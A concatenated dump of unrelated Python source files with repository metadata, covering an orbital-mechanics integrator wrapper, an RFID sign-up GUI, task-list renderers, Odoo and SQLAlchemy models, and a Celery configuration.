'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'friends.relationship': {
'Meta': {'unique_together': "[('from_user', 'to_user')]", 'object_name': 'Relationship'},
'accepted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['auth.User']"})
},
u'friends.suggestion': {
'Meta': {'unique_together': "[('from_user', 'to_user')]", 'object_name': 'Suggestion'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'relationship': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['friends.Relationship']", 'null': 'True', 'blank': 'True'}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['auth.User']"})
}
}
complete_apps = ['friends'] | [
"fran.dorr@gmail.com"
] | fran.dorr@gmail.com |
bc22cdb682ffd44df71b11ce3d8efee59f611392 | ba74367ce35aec6fb3b0985b03cdc28798d6faba | /ABIE/abie.py | 7608b8898989c322ee63f81e8958255351558ae2 | [] | no_license | maxwelltsai/ABIE | e2e85163a44f01bbfa3ef4ef2e76666bdbf307ed | a6c36fbd2ce3bfa125a81a1512ff30dcbdcb9c19 | refs/heads/master | 2021-06-11T01:36:09.466921 | 2021-04-13T12:36:32 | 2021-04-13T12:36:32 | 152,776,610 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,895 | py | """
Alice-Bob Integrator Environment (ABIE), created by Alice and Bob in the Moving Planets Around (MPA) project.
Features:
1. The integrator takes input either from the commandline, or from the config file
2. The integrator periodically stores data to HDF5
3. The integrator supports restarting simulations
The MPA team, 2017-2018
"""
import argparse
import toml
from integrator import Integrator
import numpy as np
import sys
from data_io import DataIO
class ABIE(object):
def __init__(self):
# =================== CONSTANTS ==================
# by default, using the square of the Gaussian gravitational constant
self.__CONST_G = 0.000295912208232213 # units: (AU^3/day^2)
self.__CONST_C = 0.0 # speed of light; PN terms will be calculated if CONST_C > 0
# # =================== VARIABLES ==================
self.__t = 0.0
self.__t_start = 0.0
self.__t_end = 0.0
self.__h = 0.0
self.__store_dt = 100 # output is triggered per 100 time units
self.__buffer_len = 1024 # size of dataset in a hdf5 group
self.__max_close_encounter_events = 1
self.__max_collision_events = 1
self.__close_encounter_distance = 0.0
# self.acceleration_method = 'numpy'
# load integrator modules
self.__integrators = None # a collection of integrators loaded from modules
self.__integrator = None # the actual, active integrator instance
self.output_file = 'data.hdf5'
self.__close_encounter_output_file = 'close_encounters.txt'
self.__collision_output_file = 'collisions.txt'
@property
def max_close_encounter_events(self):
if self.__integrator is not None:
self.__max_close_encounter_events = self.__integrator.max_close_encounter_events
return self.__max_close_encounter_events
else:
return self.__max_close_encounter_events
@max_close_encounter_events.setter
def max_close_encounter_events(self, value):
self.__max_close_encounter_events = value
if self.__integrator is not None:
self.__integrator.max_close_encounter_events = value
@property
def max_collision_events(self):
if self.__integrator is not None:
self.__max_collision_events = self.__integrator.collision_events
return self.__max_collision_events
else:
return self.__max_collision_events
@max_collision_events.setter
def max_collision_events(self, value):
self.__max_collision_events = value
if self.__integrator is not None:
self.__integrator.max_collision_events = value
@property
def close_encounter_distance(self):
if self.__integrator is not None:
self.__close_encounter_distance = self.__integrator.max_close_encounter_events
return self.__close_encounter_distance
else:
return self.__close_encounter_distance
@close_encounter_distance.setter
def close_encounter_distance(self, value):
self.__close_encounter_distance = value
if self.__integrator is not None:
self.__integrator.close_encounter_distance = value
@property
def close_encounter_output_file(self):
if self.__integrator is not None:
self.__close_encounter_output_file = self.__integrator.close_encounter_output_file
return self.__close_encounter_output_file
else:
return self.__close_encounter_output_file
@close_encounter_output_file.setter
def close_encounter_output_file(self, value):
self.__close_encounter_output_file = value
if self.__integrator is not None:
self.__integrator.close_encounter_output_file = value
@property
def collision_output_file(self):
if self.__integrator is not None:
self.__collision_output_file = self.__integrator.collision_output_file
return self.__collision_output_file
else:
return self.__collision_output_file
@collision_output_file.setter
def collision_output_file(self, value):
self.__collision_output_file = value
if self.__integrator is not None:
self.__integrator.collision_output_file = value
@property
def integrator(self):
if self.__integrator is None:
raise RuntimeError('Integrator not set!')
return self.__integrator
@property
def particles(self):
if self.__integrator is None:
raise RuntimeError('Particle sets undefined because the integrator is not set!')
return self.__integrator.particles
@property
def t(self):
if self.__integrator is not None:
self.__t = self.integrator.t
return self.__t
else:
return self.__t
@property
def CONST_G(self):
if self.__integrator is not None:
self.__CONST_G = self.__integrator.CONST_G
return self.__CONST_G
else:
return self.__CONST_G
@CONST_G.setter
def CONST_G(self, value):
self.__CONST_G = value
if self.__integrator is not None:
self.__integrator.CONST_G = value
@property
def CONST_C(self):
if self.__integrator is not None:
self.__CONST_C = self.__integrator.CONST_C
return self.__CONST_C
else:
return self.__CONST_C
@CONST_C.setter
def CONST_C(self, value):
self.__CONST_C = value
if self.__integrator is not None:
self.__integrator.CONST_C = value
@property
def t_end(self):
if self.__integrator is not None:
self.__t_end = self.integrator.t_end
return self.__t_end
else:
return self.__t_end
@t_end.setter
def t_end(self, tf):
self.__t_end = tf
if self.__integrator is not None:
self.integrator.t_end = tf
@property
def h(self):
if self.__integrator is not None:
self.__h = self.integrator.h
return self.__h
else:
return self.__h
@h.setter
def h(self, value):
self.__h = value
if self.__integrator is not None:
self.__integrator.h = value
@property
def store_dt(self):
if self.__integrator is not None:
self.__store_dt = self.__integrator.__store_dt
return self.__store_dt
else:
return self.__store_dt
@store_dt.setter
def store_dt(self, value):
self.__store_dt = value
if self.__integrator is not None:
self.__integrator.store_dt = self.__store_dt
@property
def buffer_len(self):
if self.__integrator is not None:
self.__buffer_len = self.__integrator.buffer_len
return self.__buffer_len
else:
return self.__buffer_len
@buffer_len.setter
def buffer_len(self, value):
self.__buffer_len = value
if self.__integrator is not None:
self.__integrator.buffer_len = self.__buffer_len
@property
def acceleration_method(self):
return self.integrator.acceleration_method
@acceleration_method.setter
def acceleration_method(self, value):
self.__integrator.acceleration_method = value
@integrator.setter
def integrator(self, name_of_integrator):
if self.__integrators is None:
self.__integrators = Integrator.load_integrators()
print(('Setting the integrator to %s' % name_of_integrator))
# populate the parameters to the integrator
if name_of_integrator in self.__integrators:
self.__integrator = getattr(self.__integrators[name_of_integrator], name_of_integrator)()
self.__integrator.CONST_G = self.CONST_G
self.__integrator.t_end = self.__t_end
self.__integrator.h = self.__h
self.__integrator.t_start = self.__t_start
self.__integrator.output_file = self.output_file
self.__integrator.collision_output_file = self.collision_output_file
self.__integrator.close_encounter_output_file = self.close_encounter_output_file
self.__integrator.store_dt = self.__store_dt
self.__integrator.buffer_len = self.__buffer_len
def initialize(self, config=None):
# Initialize the integrator
self.__integrators = Integrator.load_integrators()
if self.__integrator is None:
print('Use GaussRadau15 as the default integrator...')
self.integrator = 'GaussRadau15'
self.integrator.initialize()
self.integrator.acceleration_method = 'ctypes'
else:
self.__integrator.CONST_G = self.CONST_G
self.__integrator.t_end = self.__t_end
self.__integrator.h = self.__h
self.__integrator.t_start = self.__t_start
self.__integrator.output_file = self.output_file
self.__integrator.store_dt = self.__store_dt
self.__integrator.buffer_len = self.__buffer_len
if config is not None:
# Gravitational parameter
self.integrator.CONST_G = np.array(config['physical_params']['G'])
# Integration parameters
self.integrator = config['integration']['integrator']
self.integrator.initialize()
self.integrator.h = float(config['integration']['h'])
if 'acc_method' in config['integration']:
self.integrator.acceleration_method = config['integration']['acc_method']
else:
self.integrator.acceleration_method = 'ctypes'
# Load sequence of object names
if 'names' in config:
names = config['names']
else:
names = None
# Initial and final times
if self.integrator.t_start == 0:
self.integrator.t_start = float(config['integration']['t0'])
if self.integrator.t_end == 0:
self.integrator.t_end = float(config['integration']['tf'])
self.integrator.active_integrator = config['integration']['integrator']
DataIO.ic_populate(config['initial_conds'], self, names=names)
def stop(self):
"""Stop the integrator and clean up the memory"""
self.integrator.stop()
def set_additional_forces(self, ext_acc):
if ext_acc.ndim == 1 and ext_acc.shape[0] == 3 * self.integrator.particles.N:
self.integrator.set_additional_forces(ext_acc)
else:
print('WARNING: Additional forces array needs to be 3 * N vector, where N is the number of particles.')
def integrate(self, to_time=None):
try:
return self.integrator.integrate(to_time)
except KeyboardInterrupt as e:
print('Keyboard Interruption detected (Ctrl+C). Simulation stopped. Stopping the code...')
self.stop()
sys.exit(0)
def calculate_orbital_elements(self, primary=None):
return self.integrator.calculate_orbital_elements(primary)
def calculate_energy(self):
return self.integrator.calculate_energy()
def add(self, pos=None, vel=None, x=None, y=None, z=None, vx=None, vy=None, vz=None, mass=0.0, name=None,
radius=0.0, ptype=0, a=None, e=0.0, i=0.0, Omega=0.0, omega=0.0, f=0.0, primary=None):
if x is not None and y is not None and z is not None:
pos = np.empty(3, dtype=np.double)
pos[0] = x
pos[1] = y
pos[2] = z
if x is not None and y is not None and z is not None:
pos = np.empty(3, dtype=np.double)
pos[0] = x
pos[1] = y
pos[2] = z
if vx is not None and vy is not None and vz is not None:
vel = np.empty(3, dtype=np.double)
vel[0] = vx
vel[1] = vy
vel[2] = vz
return self.integrator.particles.add(pos=pos, vel=vel, mass=mass, name=name, radius=radius,
ptype=ptype, a=a, e=e, i=i, Omega=Omega,
omega=omega, f=f, primary=primary)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', help='config file', default=None)
parser.add_argument('-o', '--output_file', dest='output_file', help='output data file', default='data.hdf5')
parser.add_argument('-r', '--rebound_file', help='Rebound simulation file', default=None)
parser.add_argument('-t', '--t_end', type=float, dest='t_end', help='Termination time')
parser.add_argument('-d', '--dt', type=float, dest='dt', help='Integration time step (optional for certain integrators)', default=None)
parser.add_argument('-s', '--store_dt', type=float, dest='store_dt', help='output time step', default=100)
parser.add_argument('-i', '--integrator', dest='integrator', help='Name of the integrator [GaussRadau15|WisdomHolman|RungeKutta|AdamsBashForth|LeapFrog|Euler]', default='GaussRadau15')
args = parser.parse_args()
abie = ABIE()
abie.integrator = args.integrator
if args.output_file is not None:
abie.output_file = args.output_file
if args.t_end is not None:
abie.t_end = args.t_end
if args.config is not None:
abie.initialize(DataIO.parse_config_file(args.config))
elif args.rebound_file is not None:
# populate the initial conditions from rebound simulation files
abie.initialize()
DataIO.ic_populate_from_rebound(args.rebound_file, abie)
if args.dt is not None:
abie.h = args.dt
abie.store_dt = args.store_dt
abie.integrate()
if __name__ == "__main__":
main()
| [
"maxwellemail@gmail.com"
] | maxwellemail@gmail.com |
c36f7a69fafecec3d2e69a8488282cbbc98906bb | 90f8077e9460764dc2d90a8ea1d1913e463bfcef | /gui.py | ca12f5061382e762efca1030aadf89dbc8fa188a | [] | no_license | area515/rfidreader | bf82808ffcea1207752520aeadf0a6c20672467c | 4460b79ce96ff45a83e42b8edc2cf26b9ccff9f1 | refs/heads/master | 2021-01-17T14:02:09.177095 | 2016-08-03T01:09:29 | 2016-08-03T01:09:29 | 18,233,249 | 8 | 3 | null | 2016-08-03T01:09:30 | 2014-03-29T03:10:03 | Python | UTF-8 | Python | false | false | 3,054 | py | '''
@author: Sean O'Bryan, Ross Hendrickson
'''
from Tkinter import *
import Tkinter
import tkMessageBox
import os
import subprocess
import rfid
import gnupg
import pygame
root = Tk()
root.wm_title("RFID Reader")
root.columnconfigure(0, weight=1)
# make a solenoid
solenoid = rfid.Solenoid(12, 10)
# make an rfid reader
reader = rfid.Reader(solenoid)
reader.start()
def play_sound(filename):
pygame.mixer.init()
pygame.mixer.music.load(filename)
pygame.mixer.music.play()
while pygame.mixer.music.get_busy() == True:
continue
def Refresher():
if labelrfidoutput.cget("text") != reader.lastkey:
play_sound('readtag.wav')
labelrfidoutput.config(text=reader.lastkey)
labelrfidoutput.after(1000, Refresher) # every second...
def encrypt(message):
gpg = gnupg.GPG(gnupghome='/home/pi/.gnupg')
unencrypted_string = message
encrypted_data = gpg.encrypt(unencrypted_string, 'globalw2865@gmail.com')
encrypted_string = str(encrypted_data)
return encrypted_string
def Clear():
labelrfidoutput.config(text="")
entryname.delete(0, Tkinter.END)
entryemail.delete(0, Tkinter.END)
reader.lastkey = ""
def Submit():
play_sound('submit.wav')
name = entryname.get()
email = entryemail.get()
key = reader.lastkey
message = "%s|%s|%s\n" % (name,email,key)
with open("Output.txt", "a") as text_file:
text_file.write(encrypt(message))
tkMessageBox.showinfo("Success", "Your info was submited.")
# Vector group
labelframepersonalinfo = LabelFrame(root, text="Personal Info")
labelframepersonalinfo.grid(row=3, sticky = W+E+N+S )
labelframepersonalinfo.columnconfigure(1, weight=1)
labelframepersonalinfo.rowconfigure(0, weight=1)
labelframepersonalinfo.rowconfigure(1, weight=1)
labelframepersonalinfo.rowconfigure(2, weight=1)
labelframepersonalinfo.rowconfigure(3, weight=1)
# Set Power label/entry
labelname = Label(labelframepersonalinfo, text="Name")
labelname.grid(row=0, column=0,stick = W)
entryname = Entry(labelframepersonalinfo, bd =5)
entryname.grid(row=0, column=1, stick = W+E)
# Set Power label/entry
labelemail = Label(labelframepersonalinfo, text="Email")
labelemail.grid(row=1, column=0,stick = W)
entryemail = Entry(labelframepersonalinfo, bd =5)
entryemail.grid(row=1, column=1, stick = W+E)
# Current Power lable/entry
labelkey = Label(labelframepersonalinfo, text="Key")
labelkey.grid(row=2, column=0, sticky = W)
labelrfidoutput = Label(labelframepersonalinfo, text="Scan your key...") #, textvariable=reader.lastkey)
labelrfidoutput.grid(row=2, column=1,sticky = W+E+N+S)
# Open LinuxCNC Vector
buttonclear = Button(labelframepersonalinfo, text="Reset", command=Clear)
buttonclear.grid(row=3, columnspan=2,sticky = W+E+N+S)
# Open LinuxCNC Vector
buttonsubmitinfo = Button(labelframepersonalinfo, text="Submit", command=Submit)
buttonsubmitinfo.grid(row=4, columnspan=2,sticky = W+E+N+S)
labelrfidoutput.after(1000, Refresher) # every second...
#.showinfo(title, message, options)
root.mainloop()
| [
"stobryan@gmail.com"
] | stobryan@gmail.com |
12b51993b07c520189e37f6d63646560f98ae82d | ea83b212a42554d1a783c2d5ad2dc2c4c946f330 | /plugin/taskmage2/asttree/renderers.py | 03793fbb0c5bf14455a7128772a1803d44ac33a4 | [
"BSD-2-Clause"
] | permissive | willjp/vim-taskmage | 9e80b5cd7c906221d95feb29e399e7a17b59c44f | adcf809ccf1768753eca4dadaf6279b34e8d5699 | refs/heads/master | 2022-01-07T16:10:34.696385 | 2021-12-27T21:05:26 | 2021-12-27T21:05:26 | 99,585,518 | 1 | 0 | BSD-2-Clause | 2021-02-10T05:42:43 | 2017-08-07T14:16:10 | Python | UTF-8 | Python | false | false | 11,401 | py | #!/usr/bin/env python
"""
Name : taskmage2.parser.renderers.py
Created : Jul 27, 2018
Author : Will Pittman
Contact : willjpittman@gmail.com
________________________________________________________________________________
Description : A collection of classes to render a Parser object
into different formats.
________________________________________________________________________________
"""
# builtin
from __future__ import absolute_import, division, print_function
import os
import abc
import json
from taskmage2.parser import fmtdata
# external
# internal
class Renderer(object): # pragma: no cover
""" Abstract-Base-class for all renderers. Renders a
:py:obj:`taskmage2.parser.parsers.Parser` object into various formats.
"""
__metaclass__ = abc.ABCMeta
def __init__(self, ast):
super(Renderer, self).__init__()
self._ast = ast
@property
def ast(self):
return self._ast
def render(self):
""" render AST in provided format.
"""
raise NotImplementedError
class TaskList(Renderer):
""" `AST` to ReStructuredText inspired TaskList format.
Displays files/sections/tasks, hierarchy, and status.
Example:
Example of a ``TaskList`` format file.
.. code-block:: ReStructuredText
* {*768D3CDC543044488462C9CE6B823404*} saved task
* new task
o started task
- skipped task
x finished task
* another subtask
home
====
* clean kitchen
"""
indent_lvl_chars = fmtdata.TaskList.indent_lvl_chars
def __init__(self, ast):
super(TaskList, self).__init__(ast)
def render(self):
"""
Renders the parser's Abstract-Syntax-Tree.
Returns:
.. code-block:: python
[
'* task1',
' * subtask1',
'* task2',
...
]
"""
render = []
for node in self.ast:
render = self._render_node(render, node, parent=None, indent=0)
return render
def _render_node(self, render, node, parent, indent=0):
"""
Recursively renders a node, until all children have been descended
into.
Returns:
The current render.
.. code-block:: python
[
'line1',
'line2',
'line3',
...
]
"""
# TODO: now that all nodes contain a reference to their
# parent node, this can probably be simplified
node_renderer_map = {
'file': self._render_fileheader,
'section': self._render_sectionheader,
'task': self._render_task,
}
if node.type not in node_renderer_map:
raise NotImplementedError(
'unexpected nodetype: {}'.format(repr(node))
)
render.extend(
node_renderer_map[node.type](node, parent, indent)
)
for child in node.children:
# indentation is reset at 0 for tasks within sections/files
if all([
node.type in ('section', 'file'),
child.type == 'task',
]):
render = self._render_node(render, child, node, indent=0)
else:
render = self._render_node(render, child, node, indent=indent + 1)
return render
def _render_fileheader(self, node, parent, indent=0):
"""
renders a single file-header node.
Returns:
Each list-entry is a separate line.
.. code-block:: python
[
'',
'file::home/misc.task',
'====================',
'',
]
[
'',
'{*A8347624443342C1AA3A959622521E23*}file::home/misc.task',
'========================================================',
'',
]
"""
char = self.indent_lvl_chars[indent]
header_title = 'file::{}'.format(node.name)
if node.id:
header_title = ''.join(['{*', node.id, '*}']) + header_title
return [
'',
header_title,
char * len(header_title),
'',
]
def _render_sectionheader(self, node, parent, indent=0):
"""
renders a single section-header node.
Returns:
.. code-block:: python
[
'',
'kitchen tasks',
'=============',
'',
]
[
'',
'{*CE1AFBD934064E298ABFDA94AE58D838*} admin tasks',
'================================================',
'',
]
"""
char = self.indent_lvl_chars[indent]
header_title = ''
if node.id:
header_title += ''.join(['{*', node.id, '*}'])
header_title += node.name
return [
'',
header_title,
char * len(node.name),
'',
]
def _render_task(self, node, parent, indent=0):
"""
Renders a single task node.
Returns:
.. code-block:: python
['* wash dishes']
['*{*FF3DB940B75948A6A7C5BBBF4B0AFD0B*} clean counters']
"""
# produce `data`
data = {
'status_char': '',
'id_str': '',
'indent_spc': '',
'name': node.name,
}
fmtdata.TaskList.statuschar(node.data.status)
data['status_char'] = fmtdata.TaskList.statuschar(node.data.status)
if node.id:
data['id_str'] = ''.join(['{*', node.id, '*}'])
data['indent_spc'] = ' ' * (4 * indent)
lines = node.name.split('\n')
# format output
returns = ['{indent_spc}{status_char}{id_str} '.format(**data) + lines[0]]
for i in range(1, len(lines)):
returns.append('{} {}'.format(data['indent_spc'], lines[i]))
return returns
class TaskDetails(Renderer):
""" `AST` to an INI inspired view of a single task's info.
"""
def __init__(self, ast):
raise NotImplementedError()
class Mtask(Renderer):
""" `AST` to JSON - stores all info.
"""
def __init__(self, ast):
super(Mtask, self).__init__(ast)
def render(self):
"""
Renders the parser's Abstract-Syntax-Tree (list of `data.Node` s ) into a JSON string.
Returns:
.. code-block:: python
[
'line1',
'line2',
'line3',
...
]
"""
render = []
for node in self.ast:
render = self._render_node(render, node, indent=0)
# one node per line
json_nodes = [' {},'.format(json.dumps(r)) for r in render]
# remove comma from last entry
json_nodes[-1] = json_nodes[-1][:-1]
render_json = ['[']
render_json.extend(json_nodes)
render_json.append(']')
render_json.append('')
return render_json
def _render_node(self, render, node, indent=0):
"""
Recursively renders a node, until all children have been descended
into.
Returns:
The current render.
.. code-block:: python
[
{'_id':..., 'type':'file', 'name':'todo/misc.mtask', 'indent':0, 'parent':None, 'data':{}},
{'_id':..., 'type':'section', 'name':'kitchen', 'indent':0, 'parent':..., 'data':{}},
{'_id':..., 'type':'task', 'name':'wash dishes', 'indent':0, 'parent':..., 'data':{...}},
{'_id':..., 'type':'task', 'name':'grocery list', 'indent':0, 'parent':..., 'data':{...}},
...
]
"""
node_renderer_map = {
'task': self._render_task,
'section': self._render_sectionheader,
'file': self._render_fileheader,
}
if node.type not in node_renderer_map:
msg = 'unexpected nodetype: {}'.format(repr(node))
raise NotImplementedError(msg)
perform_render = node_renderer_map[node.type]
render.append(perform_render(render, node, indent))
for child in node.children:
render = self._render_node(render, child, indent=indent + 1)
return render
def _render_fileheader(self, render, node, indent=0):
"""
Returns:
.. code-block:: python
"""
return {
'_id': node.id,
'type': node.type,
'name': node.name,
'indent': indent,
'parent': node.parentid,
'data': {},
}
def _render_sectionheader(self, render, node, indent=0):
return {
'_id': node.id,
'type': node.type,
'name': node.name,
'indent': indent,
'parent': node.parentid,
'data': {},
}
def _render_task(self, render, node, indent=0):
created = None
finished = False
modified = None
if node.data.created is not None:
created = node.data.created.isoformat()
if node.data.finished:
finished = node.data.finished.isoformat()
if node.data.modified is not None:
modified = node.data.modified.isoformat()
return {
'_id': node.id,
'type': node.type,
'name': node.name,
'indent': indent,
'parent': node.parentid,
'data': {
'status': node.data.status,
'created': created,
'finished': finished,
'modified': modified,
},
}
if __name__ == '__main__': # pragma: no cover
from taskmage2.parser import lexers, iostream, parser
dirname = os.path.dirname(os.path.abspath(__file__))
for i in range(3):
dirname = os.path.dirname(dirname)
def ex_tasklist():
print('========')
print('Tasklist')
print('========')
print()
with open('{}/examples/example.tasklist'.format(dirname), 'rb') as fd:
lexer = lexers.TaskList(iostream.FileDescriptor(fd))
parser_ = parser.Parser(lexer)
renderer = TaskList(parser_)
for line in renderer.render():
print(line)
def ex_mtask():
print('=====')
print('Mtask')
print('=====')
print()
with open('{}/examples/example.mtask_'.format(dirname), 'rb') as fd:
lexer = lexers.Mtask(fd)
parser_ = parser.Parser(lexer)
renderer = Mtask(parser_)
for line in renderer.render():
print(line)
ex_tasklist()
ex_mtask()
| [
"willjpittman@gmail.com"
] | willjpittman@gmail.com |
6d21cd382eeb98e10bb5bc8a2a202726211def5f | ce6ace34704e74c2a53e9b38b2630876d9cd52e2 | /mdias_addons/metro_park_maintenance/models/day_plan_limit.py | 8f25985b0d5a8f7e281a0c359a8c74c657e8ef34 | [] | no_license | rezaghanimi/main_mdias | e3cfd8033204d8e7e484041f506892621a3e3479 | 13b428a5c4ade6278e3e5e996ef10d9fb0fea4b9 | refs/heads/master | 2022-09-17T20:15:42.305452 | 2020-05-29T05:38:35 | 2020-05-29T05:38:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 861 | py |
# -*- coding: utf-8 -*-
from odoo import models, fields, api
class DayPlanLimit(models.Model):
'''
日计划限制
'''
_name = 'metro_park_maintenance.day_plan_limit'
location = fields.Many2one(string='地点', comodel_name='metro_park_base.location')
max_repair_after_high_run = fields.Integer(string='高峰车最大检修数量')
max_repair_back_time = fields.Char(string="返回时间", help='最大返回时间')
class DayPlanLimit(models.TransientModel):
'''
日计划向导限制
'''
_name = 'metro_park_maintenance.day_plan_wizard_limit'
location = fields.Many2one(string='地点', comodel_name='metro_park_base.location')
max_repair_after_high_run = fields.Integer(string='高峰车最大检修数量')
max_repair_back_time = fields.Char(string="返回时间", help='最大返回时间')
| [
"619851623@qq.com"
] | 619851623@qq.com |
c02b9d675382a884756e42df5c3b5955974d4bd5 | d8521979287af3633ae065c5d187aa4ac9636672 | /BlockApp/core/req4register.py | 86b4a1ee44ba1a38fbe0b7e69c5666b32e028adf | [
"MIT"
] | permissive | AlbertChanX/BlockChain | 3289e74e47221996dcac8c12cdc2e7ddbdd7f9af | 5b21145bdd8b742cf7fe3b725f16a18ddf34aacf | refs/heads/master | 2023-08-15T11:00:52.973165 | 2021-09-28T12:34:44 | 2021-09-28T12:34:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | import requests,json
import fire
def register(url, node_url):
# url = "http://127.0.0.1:8000"
pay_load = {
"node" : [node_url]
}
url = url+'/register'
print(pay_load['node'])
# post data must be json string
req = requests.post(url, data=json.dumps(pay_load))
print(req.status_code)
print(req.json())
# python3 req4register.py http://127.0.0.1:8000 http://127.0.0.1:8001
if __name__ == '__main__':
fire.Fire(register) | [
"292368101@qq.com"
] | 292368101@qq.com |
8621122cc4212144fa368ce62b7b1f138087f702 | aecc10302c1a69f27b1cec4173aabcfc2b18706d | /artemis/celery_mq.py | f0c5bbf60f33684184a6ed44db3c8c3a338aaf0e | [
"Apache-2.0"
] | permissive | shangjunimo/ooqitech-artemis | ac6047e8fab8dc3086d1254bc88ba3e5c2cdc566 | bd410c274d2bf01fe69423589b19f2b7aabb7ead | refs/heads/master | 2023-01-13T16:46:36.559436 | 2019-09-19T08:06:29 | 2019-09-19T08:06:29 | 209,502,880 | 0 | 0 | Apache-2.0 | 2022-12-27T15:35:34 | 2019-09-19T08:33:26 | JavaScript | UTF-8 | Python | false | false | 525 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from celery import Celery
from event_consumer.handlers import AMQPRetryConsumerStep
from artemis.settings import CELERY_CONSUMER_MQ_BROKER_URL
class Config:
enable_utc = False
timezone = 'Asia/Shanghai'
BROKER_URL = CELERY_CONSUMER_MQ_BROKER_URL
CELERY_RESULT_BACKEND = CELERY_CONSUMER_MQ_BROKER_URL
consumer_app = Celery()
consumer_app.config_from_object(Config)
consumer_app.steps['consumer'].add(AMQPRetryConsumerStep)
| [
"hui.yang@ooqi.cn"
] | hui.yang@ooqi.cn |
c0ad5e4f594c2a0a8a067a743865488afb3283c2 | 7cdf3898d32f397475033d282cd9907fb0f0e239 | /api/v1/database.py | 630b5a385410ec500e77f52ed4b455c7cd1e4ba9 | [] | no_license | Monk-Liu/Orienteering | fccbc9f4d679aa88783d87c085f70d135aff15c7 | 1c7f88fa7c31c202509d37841f0b159a74398acc | refs/heads/master | 2021-01-19T06:59:09.083177 | 2016-06-27T12:00:48 | 2016-06-27T12:00:48 | 46,102,081 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,349 | py | from config import SQLINFO
import sqlalchemy
from sqlalchemy import Column,Integer,String,Text,DateTime,Float
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker,relationship,backref
from sqlalchemy.schema import Table,ForeignKey
import redis
import uuid
from utils import encrytovalue
def Redis():
#return redis.Redis('localhost',6379,0)
return
engine = sqlalchemy.engine_from_config(SQLINFO)
Base = declarative_base()
Session = sessionmaker(bind=engine)
# two way to make one to one relationship backref or foreignkey
'''
ToDo: 1.set Column as unicode,text
2.cascade : default is save-update merge
other contain all,delte-orphan,
see:http://docs.sqlalchemy.org/en/latest/orm/cascades.html#backref-cascade
3.passive_detele
4.what's the difference between unicode and string
'''
class UserEvent(Base):
__tablename__ = 'user_event'
event_id = Column(String(50), ForeignKey('events.id'),primary_key=True)
user_id = Column(Integer, ForeignKey('userinfo.id'),primary_key=True)
finish_time = Column(String(20))
finish_points = Column(Integer) # 本来是要有 和point的对应关系的,但是可以用另一种、
#更快的方法实现的, 主要是 类似 linux 权限管理的 1 4 7 那些数字一样的想法
event = relationship("Event")
parent = relationship("UserInfo")
def __init__(self, finish_time='', finish_points=0):
self.finish_time = finish_time
self.finish_points = finish_points
class User(Base):
__tablename__ = 'users'
id = Column(String(50),primary_key=True)
phone = Column(String(20))
password = Column(String(50))
info = relationship('UserInfo',backref=backref('user',uselist=False))
def __init__(self,phone=None,password=None,id=None):
if not id:
self.phone = str(phone)
self.id = str(uuid.uuid4())
self.password = encrytovalue(password)
else:
self.id = id
def __repr__(self):
return "<User (phone='%s',id='%s')"%(self.phone,self.id)
class OAuthor(Base):
__tablename__ = 'OAuthor'
id = Column(String(50));
openid = Column(String(70),primary_key=True)
def __init__(self,id):
self.openid = id
self.id = str(uuid.uuid4())
class UserInfo(Base):
__tablename__ = 'userinfo'
id = Column(Integer,primary_key=True)
user_id = Column(String(50),ForeignKey('users.id'))
nickname = Column(String(60))
img_url = Column(String(3000))
#img_url 没有做短url的必要吗?
birthday = Column(String(60))
sex = Column(Integer)
height = Column(Integer)
weight = Column(Integer)
area = Column(String(30))
#so what the lambda used for? http://docs.sqlalchemy.org/en/latest/orm/basic_relationships.html#one-to-one
join_event = relationship('UserEvent',
backref='the_user',
passive_deletes = True
)
host_event = relationship('Event',backref='hoster',passive_deletes=True)
